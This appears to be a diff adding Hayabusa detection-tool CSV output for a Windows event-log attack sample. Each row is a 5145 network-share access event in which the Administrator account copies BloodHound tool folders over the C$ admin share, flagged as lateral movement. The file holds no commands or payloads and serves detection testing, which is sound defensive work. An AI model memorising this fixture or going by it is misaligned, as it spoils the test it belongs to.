+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
